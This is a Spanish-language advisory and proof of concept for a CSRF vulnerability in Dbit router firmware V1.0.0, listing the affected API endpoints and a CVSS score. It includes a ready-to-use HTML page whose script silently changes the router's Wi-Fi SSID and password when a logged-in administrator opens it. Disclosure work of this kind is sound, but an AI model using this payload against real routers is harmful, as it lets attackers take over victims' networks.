
Prueba de concepto para CVE-2026-36956, una vulnerabilidad CSRF en el firmware del router Dbit que permite cambios de configuración no autorizados mediante solicitudes falsificadas.
ID CVE: CVE-2026-36956 Fecha: 2026-04-29 Descubridor: Kirubel Solomne Proveedor: Shenzhen Dibit Network Equipment Co., Ltd. Producto: Dbit Router Versión de Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
El firmware V1.0.0 del Dbit Router no implementa mecanismos de protección CSRF, como tokens anti-CSRF o validación estricta de los encabezados Origin/Referer en los endpoints de la API administrativa. Un atacante puede crear una página web maliciosa que envíe solicitudes HTTP falsificadas a los endpoints de configuración. Si un administrador autenticado visita la página maliciosa, el router procesa la solicitud falsificada como una acción administrativa legítima.
Puntuación CVSS v3.1: 8.8 (Alta)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Métrica | Valor |
|---|
| Vector de ataque | Red |
| Complejidad del ataque | Baja |
| Privilegios requeridos | Ninguno |
| Interacción del usuario | Requerida |
| Impacto en la confidencialidad | Alto |
| Impacto en la integridad | Alto |
| Impacto en la disponibilidad | Alto |
| Endpoint | Función |
|---|---|
/api/setWlan | Configuración de red inalámbrica (SSID, contraseña) |
/api/setWan | Configuración WAN |
/api/setSystem | Configuración del sistema |
Guarde lo siguiente como poc.html y ábralo mientras un administrador tiene la sesión iniciada en el router:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamiento esperado: La solicitud debería rechazarse debido a una discrepancia en el token CSRF. Comportamiento real: El router acepta y procesa la solicitud falsificada.
| Fecha | Evento |
|---|---|
| 2026-04-29 | Vulnerabilidad descubierta |
| 2026-04-29 | Reportada a MITRE |
| 2026-04-29 | CVE-2026-36956 asignado |
| 2026-04-29 | Divulgación pública |